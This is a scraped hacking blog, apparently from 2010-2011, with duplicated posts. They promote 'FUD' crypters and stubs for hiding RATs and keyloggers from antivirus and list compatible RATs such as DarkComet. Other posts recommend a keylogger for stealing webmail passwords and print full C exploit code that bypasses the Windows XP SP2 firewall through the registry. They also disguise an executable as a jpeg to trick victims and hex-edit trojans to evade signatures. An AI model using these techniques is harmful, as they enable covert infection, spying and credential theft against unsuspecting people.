Crypter simply assigns hidden values to each individual code within source code. Thus, the source code becomes hidden. Hence, our sent crypted trojan and virus bypass antivirus detection and our purpose of hacking them is fulfilled without any AV hindrance. Not only does this crypter hide source code, it will unpack the encryption once the program is executed.
What is FUD ???
FUD is acronym for Fully UnDetectable. With increased use of Crypters to bypass antiviruses, AV became more advanced and started including crypter definitions to even detect crypter strings within code. So, use of crypter to hide Ardamax keylogger and RATs became more complicated as nowadays, no publicly available crypter is FUD.
So, if you crypt RATs with publicly available crypters, they are bound to be detected by antiviruses. This is because most FUD crypters remain "FUD" for maximum of one or two days after their public release. To obtain FUD crypters, you have to either search for it in hacking forums or make one (which is somewhat tedius.. I am working on this).
How do I get one Crypter???
There are many crypters out on internet. But, most of them are not FUD. So, as stated above, either you have to search for one FUD crypter or make one. I have one FUD, but sorry I can't give out. Just check out this Crypter below.
The GUI and layout of this crypter is very very basic but simple to use and read. The crypter is both runtime and scantime FUD working on all Windows OS’s. Stubs are 100% FUD Runtime + Scantime.Also is 100% FUD from avira...
Steps :
1 : Download the RiTaLiN Crypter and Stubs.
Password: www.realhackingtips.blogspot.com
2 : Make a new folder
3 : Extract RiTaLiN Crypter to the new folder
4 : Extract the Stubscollection from the other zip file you downloaded into folder where you extracted RiTaLiN Crypter
5 : If your cryped file becomes detcted remove the Stub.exe from the folder and rename one of the other Stubs to stub.exe
6 : Enjoy !
Note :
Whats with the Stubs,How do I use them,etc?.
[-]Well,It is like any other crypter but most crypters you download on HF only include 1 stub and which is not even updated regular.But I include up to 10 stubs in the stub download package and REFUD them each time there is a detection.
So Extract the stubs to the same folder you have RiTaLiN crypter.Just crypt like you would normally do.To use another stub delete stub.exe and rename one of the other stubs to stub (make sure its an .exe file which it is already is)
Update: Most of the public crypters and keyloggers are detected by antiviruses. If you want to have a FUD version of keylogger, please use best Hacking software- Winspy Keylogger which is FUD(Fully UnDetectable). This is personally recommended keylogger from realhackingtips.
So guys, this is all about crypter.If you have any problem regarding crypters, please mention it in comments.
Enjoy Crypter download...
What is Crypter???
As said above, Crypter is free software used to hide our viruses, RATs or any keylogger from antiviruses so that they are not detected and deleted by antiviruses. Thus, a crypter is a program that allow users to crypt the source code of their program. Generally, antivirus work by splitting source code of application and then search for certain string within source code.
If antivirus detects any certain malicious strings, it either stops scan or deletes the file as virus from system.
What does Crypter do???
Crypter simply assigns hidden values to each individual code within source code. Thus, the source code becomes hidden. Hence, our sent crypted trojan and virus bypass antivirus detection and our purpose of hacking them is fulfilled without any AV hindrance. Not only does this crypter hide source code, it will unpack the encryption once the program is executed.
What is FUD ???
FUD is acronym for Fully UnDetectable. With increased use of Crypters to bypass antiviruses, AV became more advanced and started including crypter definitions to even detect crypter strings within code. So, use of crypter to hide Ardamax keylogger and RATs became more complicated as nowadays, no publicly available crypter is FUD.
So, if you crypt RATs with publicly available crypters, they are bound to be detected by antiviruses. This is because most FUD crypters remain "FUD" for maximum of one or two days after their public release. To obtain FUD crypters, you have to either search for it in hacking forums or make one (which is somewhat tedius.. I am working on this).
How do I get one Crypter???
There are many crypters out on internet. But, most of them are not FUD. So, as stated above, either you have to search for one FUD crypter or make one. I have one FUD, but sorry I can't give out. Just check out this Crypter below.
The GUI and layout of this crypter is very very basic but simple to use and read. The crypter is both runtime and scantime FUD working on all Windows OS’s. Stubs are 100% FUD Runtime + Scantime.Also is 100% FUD from avira...
Steps :
1 : Download the RiTaLiN Crypter and Stubs.
Password: www.realhackingtips.blogspot.com
2 : Make a new folder
3 : Extract RiTaLiN Crypter to the new folder
4 : Extract the Stubscollection from the other zip file you downloaded into folder where you extracted RiTaLiN Crypter
5 : If your cryped file becomes detcted remove the Stub.exe from the folder and rename one of the other Stubs to stub.exe
6 : Enjoy !
Note :
Whats with the Stubs,How do I use them,etc?.
[-]Well,It is like any other crypter but most crypters you download on HF only include 1 stub and which is not even updated regular.But I include up to 10 stubs in the stub download package and REFUD them each time there is a detection.
So Extract the stubs to the same folder you have RiTaLiN crypter.Just crypt like you would normally do.To use another stub delete stub.exe and rename one of the other stubs to stub (make sure its an .exe file which it is already is)
Update: Most of the public crypters and keyloggers are detected by antiviruses. If you want to have a FUD version of keylogger, please use best Hacking software- Winspy Keylogger which is FUD(Fully UnDetectable). This is personally recommended keylogger from realhackingtips.
So guys, this is all about crypter.If you have any problem regarding crypters, please mention it in comments.
Enjoy Crypter download...
Filed Under: CRYPTER , CRYPTOGRAPHY , KEYLOGGER
Thursday, March 31, 2011
Free 100% FUD Crypter to bypass Antivirus detection: Hack Gmail,yahoo, MSN, hotmail password
Free 100% FUD Crypter to bypass Antivirus detection: Hack Gmail,yahoo, MSN, hotmail password
2011-03-31T02:43:00-07:00
wildrank
CRYPTER
|
CRYPTOGRAPHY
|
KEYLOGGER
|
UNDETECTION TECHNIQUES
|
Comments
Posted by
wildrank
on
Thursday, March 31, 2011
Previously, I posted about my first ebook on Email Hacking. Now, I am posting on new
FUD crypter
in this article. As I have said many times, FUD crypters are most important tools for any hacker as they help in bypassing antivirus detection on victim computer.
Download FUD Crypter:
1. Download FUD crypter software to bypass antivirus.
Password: www.realhackingtips.blogspot.com
2. Run the downloaded FUD crypter on your computer to see:
3. Hit on button next to Textbox with name ... and select the server file you want to crypt.
4. Hit on Crypt and select the path where you want to save the crypted file. Thats it. The final crypted file will be created at desired destination.
Note: Always scan this crypted file at Novirusthanks and remember to check "Do not distribute the sample". This will ensure FUDness of the crypter for a long time.
Tested and working with:
BlackShades
CyberGate
DarkComet
iStealer
SpyNet
Compatible with all systems. (x86 & x64)
Net framework 2.0 dependent.
On windows 7 and vista it will bypass security dialog when adding to startup.
So friends, enjoy this
FUD crypter
before it is detected by any antiviruses. Since this is public crypter, it will be detected after some days.
If you have any problem in using this FUD crypter, please mention it in comments.
Enjoy FUD Crypter download...
FUD crypter
in this article. As I have said many times, FUD crypters are most important tools for any hacker as they help in bypassing antivirus detection on victim computer.
Download FUD Crypter:
1. Download FUD crypter software to bypass antivirus.
Password: www.realhackingtips.blogspot.com
2. Run the downloaded FUD crypter on your computer to see:
3. Hit on button next to Textbox with name ... and select the server file you want to crypt.
4. Hit on Crypt and select the path where you want to save the crypted file. Thats it. The final crypted file will be created at desired destination.
Note: Always scan this crypted file at Novirusthanks and remember to check "Do not distribute the sample". This will ensure FUDness of the crypter for a long time.
Tested and working with:
BlackShades
CyberGate
DarkComet
iStealer
SpyNet
Compatible with all systems. (x86 & x64)
Net framework 2.0 dependent.
On windows 7 and vista it will bypass security dialog when adding to startup.
So friends, enjoy this
FUD crypter
before it is detected by any antiviruses. Since this is public crypter, it will be detected after some days.
If you have any problem in using this FUD crypter, please mention it in comments.
Enjoy FUD Crypter download...
Filed Under: CRYPTER , CRYPTOGRAPHY , KEYLOGGER , UNDETECTION TECHNIQUES
Thursday, October 21, 2010
Recover Stored Google Account Passwords Google Password Decryptor
Recover Stored Google Account Passwords Google Password Decryptor
2010-10-21T03:16:00-07:00
wildrank
CRYPTOGRAPHY
|
HACK GMAIL
|
Comments
Posted by
wildrank
on
Thursday, October 21, 2010
Google Password Decryptor in Action is the free tool to recover stored Google account passwords by various applications. Most of the Google's desktop applications such as GTalk, Picassa etc store the account passwords in their private encrypted store to prevent hassale of entering the password everytime. GooglePasswordDecryptor helps in recovering such stored passwords from most of these application's private stores.
It can even show passwords from multiple accounts if you have used more than one Google account.It also comes with 'Export Feature' to save the recovered Google passwords to HTML or TEXT format for future use.
Features of GooglePasswordDecryptor
GooglePasswordDecryptor supports recovering of the stored encrypted password from most of the prominent Google desktop applications as well as internet browsers. Here is the complete list of supported applications.
* Google Talk
* Google Picassa
* Google Desktop Seach
* Gmail Notifier
* Internet Explorer (all versions from 4 to 8)
* Google Chrome
It also provides 'Export Feature' to save the recovered Google passwords to HTML or TEXT format for future use.
Download link:
http://www.multiupload.com/G6XDP6JDWT
Filed Under: CRYPTOGRAPHY , HACK GMAIL
Thursday, September 30, 2010
Bypassing Windows-XP Firewall
Bypassing Windows-XP Firewall
2010-09-30T11:01:00-07:00
wildrank
CRYPTOGRAPHY
|
Comments
Posted by
wildrank
on
Thursday, September 30, 2010
There is a technique using which we can bypass windows-xp service pack-2 firewall.
This techniques is nothing but the vulnerability found in windows-xp sp2 firewall.
This is explained here in detail with exploit code.
Windows XP Firewall Bypassing (Registry Based) :- Microsoft Windows XP SP2 comes bundled with a Firewall. Direct access to Firewall's registry keys allow local attackers to bypass the Firewall blocking list and allow malicious program to connect the network.
Credit :-
The information has been provided by Mark Kica.
The original article can be found at: http://taekwondo-itf.szm.sk/bugg.zipVulnerable Systems :-
* Microsoft Windows XP SP2
Windows XP SP2 Firewall has list of allowed program in registry which are not properly protected from modification by a malicious local attacker.
If an attacker adds a new key to the registry address of HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List, the attacker can enable his malware or Trojan to connect to the Internet without the Firewall triggering a warning.
Proof of Concept :-
Launch the regedit.exe program and access the keys found under the following path:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List
Add an entry key such as this one:
Name: C:\chat.exe
Value: C:\chat.exe:*:Enabled:chat
Exploit :-
#include
#include
#include
#include
#include "Shlwapi.h" int main( int argc, char *argv [] )
{
char buffer[1024];
char filename[1024];
HKEY hKey;
int i;
GetModuleFileName(NULL, filename, 1024);
strcpy(buffer, filename);
strcat(buffer, ":*:Enabled:");
strcat(buffer, "bugg");
RegOpenKeyEx(
HKEY_LOCAL_MACHINE,
"SYSTEM\\CurrentControlSet\\Services" "\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile" "\\AuthorizedApplications\\List",
0,
KEY_ALL_ACCESS,
&hKey);
RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));
int temp, sockfd, new_fd, fd_size;
struct sockaddr_in remote_addr;
fprintf(stdout, "Simple server example with Anti SP2 firewall trick \n");
fprintf(stdout, " This is not trojan \n");
fprintf(stdout, " Opened port is :2001 \n");
fprintf(stdout, "author:Mark Kica student of Technical University Kosice\n");
fprintf(stdout, "Dedicated to Katka H. from Levoca \n");
sleep(3);
if ((sockfd = ezsocket(NULL, NULL, 2001, SERVER)) == -1)
return 0;
for (; ; )
{
RegDeleteValue(hKey, filename);
fd_size = sizeof(struct sockaddr_in);
if ((new_fd = accept(sockfd, (struct sockaddr *)&remote_addr, &fd_size)) == -1)
{
perror("accept");
continue;
}
temp = send(new_fd, "Hello World\r\n", strlen("Hello World\r\n"), 0);
fprintf(stdout, "Sended: Hello World\r\n");
temp = recv(new_fd, buffer, 1024, 0);
buffer[temp] = '\0';
fprintf(stdout, "Recieved: %s\r\n", buffer);
ezclose_socket(new_fd);
RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));
if (!strcmp(buffer, "quit"))
break;
}
ezsocket_exit();
return 0;
}
/* EoF */
This techniques is nothing but the vulnerability found in windows-xp sp2 firewall.
This is explained here in detail with exploit code.
Windows XP Firewall Bypassing (Registry Based) :- Microsoft Windows XP SP2 comes bundled with a Firewall. Direct access to Firewall's registry keys allow local attackers to bypass the Firewall blocking list and allow malicious program to connect the network.
Credit :-
The information has been provided by Mark Kica.
The original article can be found at: http://taekwondo-itf.szm.sk/bugg.zipVulnerable Systems :-
* Microsoft Windows XP SP2
Windows XP SP2 Firewall has list of allowed program in registry which are not properly protected from modification by a malicious local attacker.
If an attacker adds a new key to the registry address of HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List, the attacker can enable his malware or Trojan to connect to the Internet without the Firewall triggering a warning.
Proof of Concept :-
Launch the regedit.exe program and access the keys found under the following path:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ SharedAccess\Parameters\FirewallPolicy\StandardProfile\ AuthorizedApplications\List
Add an entry key such as this one:
Name: C:\chat.exe
Value: C:\chat.exe:*:Enabled:chat
Exploit :-
#include
#include
#include
#include
#include "Shlwapi.h" int main( int argc, char *argv [] )
{
char buffer[1024];
char filename[1024];
HKEY hKey;
int i;
GetModuleFileName(NULL, filename, 1024);
strcpy(buffer, filename);
strcat(buffer, ":*:Enabled:");
strcat(buffer, "bugg");
RegOpenKeyEx(
HKEY_LOCAL_MACHINE,
"SYSTEM\\CurrentControlSet\\Services" "\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile" "\\AuthorizedApplications\\List",
0,
KEY_ALL_ACCESS,
&hKey);
RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));
int temp, sockfd, new_fd, fd_size;
struct sockaddr_in remote_addr;
fprintf(stdout, "Simple server example with Anti SP2 firewall trick \n");
fprintf(stdout, " This is not trojan \n");
fprintf(stdout, " Opened port is :2001 \n");
fprintf(stdout, "author:Mark Kica student of Technical University Kosice\n");
fprintf(stdout, "Dedicated to Katka H. from Levoca \n");
sleep(3);
if ((sockfd = ezsocket(NULL, NULL, 2001, SERVER)) == -1)
return 0;
for (; ; )
{
RegDeleteValue(hKey, filename);
fd_size = sizeof(struct sockaddr_in);
if ((new_fd = accept(sockfd, (struct sockaddr *)&remote_addr, &fd_size)) == -1)
{
perror("accept");
continue;
}
temp = send(new_fd, "Hello World\r\n", strlen("Hello World\r\n"), 0);
fprintf(stdout, "Sended: Hello World\r\n");
temp = recv(new_fd, buffer, 1024, 0);
buffer[temp] = '\0';
fprintf(stdout, "Recieved: %s\r\n", buffer);
ezclose_socket(new_fd);
RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));
if (!strcmp(buffer, "quit"))
break;
}
ezsocket_exit();
return 0;
}
/* EoF */
Filed Under: CRYPTOGRAPHY
Sunday, September 5, 2010
Hide exe file in jpeg image
Hide exe file in jpeg image
2010-09-05T23:39:00-07:00
wildrank
CRYPTER
|
CRYPTOGRAPHY
|
Comments
Posted by
wildrank
on
Sunday, September 05, 2010
Follow These Steps
1. First Step, Create a new folder and please check that "Show hidden files" is checked and "hide extensions for known file types" is unchecked in folder options.
2. Copy your exe file source in that folder for example called first.exe.
3. Now you have to rename this first.exe file to whatever you want. Here suppose you are renaming it to second.jpeg. When you trying to renaming it windows will warn you like if you really want to change this extension from exe to jpeg, then click on YES.
4. Now create one shortcut of secong.jpeg in same folder and renaming shortcut to whatever you want suppose you are renaming it to third.exe.
5. Now right click on third.exe and go to properties, Here you have to do some changes mentioned below.
6. Delete all things which are present in start in field and leave it empty.
7. Now in this step you have to write the path to open other files second.jpeg like this: C:\WINDOWS\system32\cmd.exe /c second.jpeg
8. The last field, c second.jpeg is always the name of the first file. If you called the first file demo.avi then you you have to write
C:\WINDOWS\system32\cmd.exe /c demo.avi
9. Now here what you are doing is So what you are doing is when someone clicks on third.jpeg, a command will execute the other file second.jpeg and the source will run.
10. Now right click on third.jpeg, go to properties and then you will see one option to change your icon. Click this and then a new window will open. You have to write this : %SystemRoot%\system32\SHELL32.dll and then press OK.
11. All things are done but you have to remember two things in your mind that these 2 files must be together in the same folder and to get connected to someone they must click on the shortcut created not on the first file. So rename the files to whatever you want considering the person and the knowledge they have on this matter.
ask if u have any Question in comment box
1. First Step, Create a new folder and please check that "Show hidden files" is checked and "hide extensions for known file types" is unchecked in folder options.
2. Copy your exe file source in that folder for example called first.exe.
3. Now you have to rename this first.exe file to whatever you want. Here suppose you are renaming it to second.jpeg. When you trying to renaming it windows will warn you like if you really want to change this extension from exe to jpeg, then click on YES.
4. Now create one shortcut of secong.jpeg in same folder and renaming shortcut to whatever you want suppose you are renaming it to third.exe.
5. Now right click on third.exe and go to properties, Here you have to do some changes mentioned below.
6. Delete all things which are present in start in field and leave it empty.
7. Now in this step you have to write the path to open other files second.jpeg like this: C:\WINDOWS\system32\cmd.exe /c second.jpeg
8. The last field, c second.jpeg is always the name of the first file. If you called the first file demo.avi then you you have to write
C:\WINDOWS\system32\cmd.exe /c demo.avi
9. Now here what you are doing is So what you are doing is when someone clicks on third.jpeg, a command will execute the other file second.jpeg and the source will run.
10. Now right click on third.jpeg, go to properties and then you will see one option to change your icon. Click this and then a new window will open. You have to write this : %SystemRoot%\system32\SHELL32.dll and then press OK.
11. All things are done but you have to remember two things in your mind that these 2 files must be together in the same folder and to get connected to someone they must click on the shortcut created not on the first file. So rename the files to whatever you want considering the person and the knowledge they have on this matter.
ask if u have any Question in comment box
Filed Under: CRYPTER , CRYPTOGRAPHY
Friday, June 11, 2010
Hexing Part III : Bypass Antivirus Detection
Hexing Part III : Bypass Antivirus Detection
2010-06-11T10:25:00-07:00
wildrank
CRYPTOGRAPHY
|
UNDETECTION TECHNIQUES
|
Comments
Posted by
wildrank
on
Friday, June 11, 2010
I have previously mentioned how to find required virus definition in my article Hexing Part II. But, I just forgot to post further part of hexing. Lately.Now,I am writing next and final part of Hexing tutorial.
Finding virus definition is important so that we can change found virus definition and prevent antivirus from detecting our virus. The article below shows how to change virus offset to
bypass antivirus detection and make our trojan undetectable from antiviruses.
Make Trojan undetectable:
To change virus definition we need to have a hex editor. Hex Workshop is one of the best hex editors, I found.
1. Free Download Hex Editor to make trojan undetectable.
2. The downloaded file is zipped and password protected. Click here to get the password.
3. Now, install Hex Editor on your computer.
4. Right click on 7107.exe (obtained from Hexing Part II) and select 'Edit with Hex Workshop'.
5. You will see something like this:
Click on image to see enlarged view
6. Repeat this for 7108.exe.
7. Now, compare both files. You will see at the end 7108.exe will have offset "00" and 7107.exe does not have. So, we conclude that "00" is recognized as virus by antivirus. Note that offset. Here, offset is 0x00001BC3.
Click on image to see enlarged view
8. Now, open original IceGoldFreezer.exe in Hex Workshop and move to offset 0x00001BC3. Simply select the Dos Prompt of Hex Workshop corresponding to virus signature found in Step 6. and hit on space bar.
Click on image to see enlarged view
9. Save the file as IceGoldFreezer.exe and again run antivirus scan. Avira will not detect any virus. Also, run, IceGoldFreezer.exe on computer. It will run normally to indicate that we have made it undetectable from Avira antivirus....cheers. We have FUD freezer.
Update: Many readers had problems implementing this Hexing technique and hence I have written an article to solve those queries. If you have any problem, refer my article Hexing Queries Solved for more information.
Now, you can
make any trojan undetectable from antivirus
using this trojan undetection technique. If you have any problem while using this method to make trojan undetectable from antiviruses, please mention it in comments.
Enjoy Hexing to make trojan undetectable from antiviruses...
Finding virus definition is important so that we can change found virus definition and prevent antivirus from detecting our virus. The article below shows how to change virus offset to
bypass antivirus detection and make our trojan undetectable from antiviruses.
Make Trojan undetectable:
To change virus definition we need to have a hex editor. Hex Workshop is one of the best hex editors, I found.
1. Free Download Hex Editor to make trojan undetectable.
2. The downloaded file is zipped and password protected. Click here to get the password.
3. Now, install Hex Editor on your computer.
4. Right click on 7107.exe (obtained from Hexing Part II) and select 'Edit with Hex Workshop'.
5. You will see something like this:
Click on image to see enlarged view
6. Repeat this for 7108.exe.
7. Now, compare both files. You will see at the end 7108.exe will have offset "00" and 7107.exe does not have. So, we conclude that "00" is recognized as virus by antivirus. Note that offset. Here, offset is 0x00001BC3.
Click on image to see enlarged view
8. Now, open original IceGoldFreezer.exe in Hex Workshop and move to offset 0x00001BC3. Simply select the Dos Prompt of Hex Workshop corresponding to virus signature found in Step 6. and hit on space bar.
Click on image to see enlarged view
9. Save the file as IceGoldFreezer.exe and again run antivirus scan. Avira will not detect any virus. Also, run, IceGoldFreezer.exe on computer. It will run normally to indicate that we have made it undetectable from Avira antivirus....cheers. We have FUD freezer.
Update: Many readers had problems implementing this Hexing technique and hence I have written an article to solve those queries. If you have any problem, refer my article Hexing Queries Solved for more information.
Now, you can
make any trojan undetectable from antivirus
using this trojan undetection technique. If you have any problem while using this method to make trojan undetectable from antiviruses, please mention it in comments.
Enjoy Hexing to make trojan undetectable from antiviruses...
Filed Under: CRYPTOGRAPHY , UNDETECTION TECHNIQUES
Subscribe to:
Posts
(
Atom
)































